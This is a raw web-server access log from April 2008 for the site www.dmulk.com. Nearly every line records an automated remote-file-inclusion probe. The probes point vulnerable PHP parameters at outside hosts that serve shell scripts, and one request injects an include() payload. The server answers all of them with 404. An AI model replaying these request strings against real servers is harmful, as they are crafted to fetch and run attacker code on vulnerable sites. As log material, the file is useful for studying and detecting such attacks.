193.189.74.29 - - [01/Apr/2008:09:34:01 -0700] "GET /myevent.php?myevent_path=http://www.darkmindz.com/shell/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.189.74.29 - - [01/Apr/2008:09:34:01 -0700] "GET /logs/myevent.php?myevent_path=http://www.darkmindz.com/shell/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.191.81.165 - - [01/Apr/2008:09:34:05 -0700] "GET /logs/access_080219.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.148.95.154 - - [01/Apr/2008:09:34:31 -0700] "GET /logs/access_080215.log//modules/vwar/admin/admin.php?vwar_root=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
213.239.177.121 - - [01/Apr/2008:09:34:44 -0700] "GET /logs/access_080215.log//modules/vwar/admin/admin.php?vwar_root=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.234.144.44 - - [01/Apr/2008:09:34:46 -0700] "GET /logs/access_080223.log/index.php?body=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.234.144.44 - - [01/Apr/2008:09:34:46 -0700] "GET /index.php?body=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.234.144.44 - - [01/Apr/2008:09:34:46 -0700] "GET /logs/index.php?body=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.16.16.208 - - [01/Apr/2008:09:34:48 -0700] "GET /logs/access_080112.log//modules/vwar/admin/admin.php?vwar_root=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.16.16.208 - - [01/Apr/2008:09:34:55 -0700] "GET /logs/access_080112.log//modules/vwar/admin/admin.php?vwar_root=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.189.74.29 - - [01/Apr/2008:09:35:29 -0700] "GET /logs/access_080124.log/myevent.php?myevent_path=http://www.darkmindz.com/shell/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.97.211.97 - - [01/Apr/2008:09:35:36 -0700] "GET //admin/inc/change_action.php?format_menue=http://www.nameserver11.net/billing2/include/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
89.97.211.97 - - [01/Apr/2008:09:35:37 -0700] "GET /logs//admin/inc/change_action.php?format_menue=http://www.nameserver11.net/billing2/include/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
209.67.223.188 - - [01/Apr/2008:09:36:07 -0700] "GET /logs/access_080305.log//newspublish/include.php?path%5Bdocroot%5D=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.67.223.188 - - [01/Apr/2008:09:36:11 -0700] "GET /logs/access_080305.log//newspublish/include.php?path%5Bdocroot%5D=http://users3.nofeehost.com/maniez/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.163.141.54 - - [01/Apr/2008:09:36:26 -0700] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://www.atlant.ru/sms/img/images.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.44.238.63 - - [01/Apr/2008:09:36:36 -0700] "GET /logs/access_080119.log/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.238.63 - - [01/Apr/2008:09:36:37 -0700] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.238.63 - - [01/Apr/2008:09:36:39 -0700] "GET /logs/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.234.144.44 - - [01/Apr/2008:09:36:55 -0700] "GET /logs/access_080225.log/index.php?body=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.234.144.44 - - [01/Apr/2008:09:37:15 -0700] "GET /logs/access_080223.log/index.php?body=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.234.144.44 - - [01/Apr/2008:09:37:16 -0700] "GET /index.php?body=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.234.144.44 - - [01/Apr/2008:09:37:16 -0700] "GET /logs/index.php?body=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.238.63 - - [01/Apr/2008:09:37:47 -0700] "GET /logs/access_080119.log/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.238.63 - - [01/Apr/2008:09:37:53 -0700] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.238.63 - - [01/Apr/2008:09:37:53 -0700] "GET /logs/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.16.16.208 - - [01/Apr/2008:09:37:57 -0700] "GET /logs/access_080215.log//modules/vwar/admin/admin.php?vwar_root=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.16.16.208 - - [01/Apr/2008:09:38:00 -0700] "GET /logs/access_080215.log//modules/vwar/admin/admin.php?vwar_root=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.233.63.186 - - [01/Apr/2008:09:38:02 -0700] "GET /logs/access_080131.log/scanhttp://www.aims.unc.edu/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.239.177.121 - - [01/Apr/2008:09:38:03 -0700] "GET /logs/access_080218.log//modules/vwar/admin/admin.php?vwar_root=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.97.211.97 - - [01/Apr/2008:09:38:10 -0700] "GET /logs/%0312http://www.nameserver11.net/billing2/include/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
89.97.211.97 - - [01/Apr/2008:09:38:10 -0700] "GET /%0312http://www.nameserver11.net/billing2/include/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
211.233.63.186 - - [01/Apr/2008:09:38:13 -0700] "GET /scanhttp://www.aims.unc.edu/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.148.95.154 - - [01/Apr/2008:09:38:15 -0700] "GET /logs/access_080218.log//modules/vwar/admin/admin.php?vwar_root=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
207.44.238.63 - - [01/Apr/2008:09:38:19 -0700] "GET /logs/access_080225.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.238.63 - - [01/Apr/2008:09:38:21 -0700] "GET /logs/access_080207.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.233.63.186 - - [01/Apr/2008:09:38:22 -0700] "GET /logs/scanhttp://www.aims.unc.edu/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.238.63 - - [01/Apr/2008:09:38:27 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.238.63 - - [01/Apr/2008:09:38:27 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.234.144.44 - - [01/Apr/2008:09:38:41 -0700] "GET /logs/access_080312.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.163.169.99 - - [01/Apr/2008:09:38:43 -0700] "GET /logs/access_080207.log//newspublish/include.php?path%5Bdocroot%5D=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.163.169.99 - - [01/Apr/2008:09:38:43 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.163.169.99 - - [01/Apr/2008:09:38:43 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.195.51.217 - - [01/Apr/2008:09:38:55 -0700] "GET /retreat1/webcam/?D=A HTTP/1.0" 200 166 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
211.233.63.186 - - [01/Apr/2008:09:39:19 -0700] "GET /scanhttp://www.aims.unc.edu/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.233.63.186 - - [01/Apr/2008:09:39:27 -0700] "GET /logs/scanhttp://www.aims.unc.edu/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.239.177.121 - - [01/Apr/2008:09:39:33 -0700] "GET /logs/access_080118.log//modules/vwar/admin/admin.php?vwar_root=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.148.95.154 - - [01/Apr/2008:09:39:43 -0700] "GET /logs/access_080118.log//modules/vwar/admin/admin.php?vwar_root=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
195.205.178.120 - - [01/Apr/2008:09:39:48 -0700] "GET /error.php?error=http://www.markbadmintonclub.co.uk/calendar/tools/idmic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.148.95.154 - - [01/Apr/2008:09:39:49 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
74.205.57.211 - - [01/Apr/2008:09:41:03 -0700] "GET //Neos_Chronos/header.php?base_folder=http://hoypinoy.com/riCo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
74.205.57.211 - - [01/Apr/2008:09:41:03 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://hoypinoy.com/riCo?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
66.151.162.98 - - [01/Apr/2008:09:41:03 -0700] "GET /logs/access_080117.log/index.php?s=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.151.162.98 - - [01/Apr/2008:09:41:04 -0700] "GET /logs/index.php?s=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.16.16.208 - - [01/Apr/2008:09:41:32 -0700] "GET /logs/access_080218.log//modules/vwar/admin/admin.php?vwar_root=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.16.16.208 - - [01/Apr/2008:09:41:32 -0700] "GET /logs/access_080218.log//modules/vwar/admin/admin.php?vwar_root=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.16.16.208 - - [01/Apr/2008:09:42:50 -0700] "GET /logs/access_080118.log//modules/vwar/admin/admin.php?vwar_root=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.16.16.208 - - [01/Apr/2008:09:42:54 -0700] "GET /logs/access_080118.log//modules/vwar/admin/admin.php?vwar_root=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.44.238.63 - - [01/Apr/2008:09:42:59 -0700] "GET /logs/access_080225.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.163.169.99 - - [01/Apr/2008:09:43:18 -0700] "GET /logs/access_080305.log//newspublish/include.php?path%5Bdocroot%5D=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.234.144.44 - - [01/Apr/2008:09:43:51 -0700] "GET /logs/access_080223.log/index.php?body=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.234.144.44 - - [01/Apr/2008:09:43:57 -0700] "GET /index.php?body=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.234.144.44 - - [01/Apr/2008:09:44:02 -0700] "GET /logs/index.php?body=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.16.16.208 - - [01/Apr/2008:09:44:09 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.16.16.208 - - [01/Apr/2008:09:44:18 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.233.63.186 - - [01/Apr/2008:09:44:18 -0700] "GET /logs/access_080119.log/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.aims.unc.edu/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.2.130 - - [01/Apr/2008:09:44:22 -0700] "GET /logs/access_080215.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.2.130 - - [01/Apr/2008:09:44:22 -0700] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.233.63.186 - - [01/Apr/2008:09:44:30 -0700] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.aims.unc.edu/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.248.162.89 - - [01/Apr/2008:09:44:41 -0700] "GET /logs/access.log/error.php?error=http://www.redculture.com/mgo/upload/idmic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.233.63.186 - - [01/Apr/2008:09:44:41 -0700] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.aims.unc.edu/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.248.162.89 - - [01/Apr/2008:09:44:45 -0700] "GET /error.php?error=http://www.redculture.com/mgo/upload/idmic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.248.162.89 - - [01/Apr/2008:09:44:50 -0700] "GET /logs/error.php?error=http://www.redculture.com/mgo/upload/idmic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.239.177.121 - - [01/Apr/2008:09:45:14 -0700] "GET /logs/access_080124.log//modules/vwar/admin/admin.php?vwar_root=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.148.95.154 - - [01/Apr/2008:09:45:15 -0700] "GET /logs/access_080124.log//modules/vwar/admin/admin.php?vwar_root=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
213.198.89.199 - - [01/Apr/2008:09:45:30 -0700] "GET /logs/access_071209.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.89.199 - - [01/Apr/2008:09:45:30 -0700] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.89.199 - - [01/Apr/2008:09:45:31 -0700] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.248.162.89 - - [01/Apr/2008:09:45:42 -0700] "GET /error.php?error=http://www.redculture.com/mgo/upload/idmic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.163.169.99 - - [01/Apr/2008:09:46:38 -0700] "GET /logs/access_080207.log//newspublish/include.php?path%5Bdocroot%5D=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.163.169.99 - - [01/Apr/2008:09:46:38 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.163.169.99 - - [01/Apr/2008:09:46:38 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.24.124 - - [01/Apr/2008:09:47:09 -0700] "GET /megumi/Necklace/?S=A HTTP/1.0" 200 4307 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
80.67.27.166 - - [01/Apr/2008:09:47:25 -0700] "GET /%034administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=wwww.hotnews.altervista.org/cmd2.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.65 - - [01/Apr/2008:09:47:29 -0700] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://www.atlant.ru/sms/img/images.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.195.44.111 - - [01/Apr/2008:09:47:29 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
84.18.207.65 - - [01/Apr/2008:09:47:30 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.atlant.ru/sms/img/images.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.105.119.16 - - [01/Apr/2008:09:47:30 -0700] "GET /logs/access_080207.log/config.php?path_to_root=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.195.44.99 - - [01/Apr/2008:09:47:30 -0700] "GET /logs/access_080223.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
88.105.119.16 - - [01/Apr/2008:09:47:31 -0700] "GET /config.php?path_to_root=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.105.119.16 - - [01/Apr/2008:09:47:31 -0700] "GET /logs/config.php?path_to_root=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.2.130 - - [01/Apr/2008:09:47:35 -0700] "GET /logs/access_080126.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.105.119.16 - - [01/Apr/2008:09:47:59 -0700] "GET /logs/access_080213.log/config.php?path_to_root=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.105.119.16 - - [01/Apr/2008:09:48:18 -0700] "GET /config.php?path_to_root=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.16.16.208 - - [01/Apr/2008:09:48:24 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://www.xdengue.xpg.com.br/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.16.16.208 - - [01/Apr/2008:09:48:24 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.xdengue.xpg.com.br/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.16.16.208 - - [01/Apr/2008:09:48:25 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.xdengue.xpg.com.br/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.148.95.154 - - [01/Apr/2008:09:48:39 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.148.95.154 - - [01/Apr/2008:09:48:40 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
195.248.162.89 - - [01/Apr/2008:09:48:55 -0700] "GET /logs/access.log/error.php?error=http://www.redculture.com/mgo/upload/idmic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.248.162.89 - - [01/Apr/2008:09:48:57 -0700] "GET /error.php?error=http://www.redculture.com/mgo/upload/idmic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.248.162.89 - - [01/Apr/2008:09:49:01 -0700] "GET /logs/error.php?error=http://www.redculture.com/mgo/upload/idmic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.10.128.138 - - [01/Apr/2008:09:49:10 -0700] "GET //ashnews.php?pathtoashnews=http://www.atlant.ru/sms/img/images.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.18.207.65 - - [01/Apr/2008:09:49:43 -0700] "GET /logs/access_071215.log//skin/zero_vote/ask_password.php?dir=http://www.atlant.ru/sms/img/images.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.31.245 - - [01/Apr/2008:09:49:59 -0700] "GET /mobileoffice/?S=A HTTP/1.0" 200 5008 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.3.249.71 - - [01/Apr/2008:09:50:03 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
72.3.249.71 - - [01/Apr/2008:09:50:03 -0700] "GET /logs/skin/zero_vote/ask_password.php?dir=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
217.16.16.208 - - [01/Apr/2008:09:50:52 -0700] "GET /logs/access_080124.log//modules/vwar/admin/admin.php?vwar_root=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.16.16.208 - - [01/Apr/2008:09:51:04 -0700] "GET /logs/access_080124.log//modules/vwar/admin/admin.php?vwar_root=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.163.169.99 - - [01/Apr/2008:09:51:18 -0700] "GET /logs/access_080305.log//newspublish/include.php?path%5Bdocroot%5D=http://www.comfycouch.ca/guest_book/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.93.56.181 - - [01/Apr/2008:09:52:10 -0700] "GET /logs/access.log//atom.php5?page=http://www.forpinkpussy.com/languages/.inc/read.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.56.181 - - [01/Apr/2008:09:52:10 -0700] "GET //atom.php5?page=http://www.forpinkpussy.com/languages/.inc/read.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.56.181 - - [01/Apr/2008:09:52:11 -0700] "GET /logs//atom.php5?page=http://www.forpinkpussy.com/languages/.inc/read.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.3.249.71 - - [01/Apr/2008:09:52:17 -0700] "GET /logs/skin/zero_vote/ask_password.php?dir=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
72.3.249.71 - - [01/Apr/2008:09:52:17 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
85.234.144.44 - - [01/Apr/2008:09:52:33 -0700] "GET /logs/access_080129.log/index.php?pageurl=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.100.12.226 - - [01/Apr/2008:09:52:45 -0700] "GET /logs/access.log/poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.100.12.226 - - [01/Apr/2008:09:52:46 -0700] "GET /poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
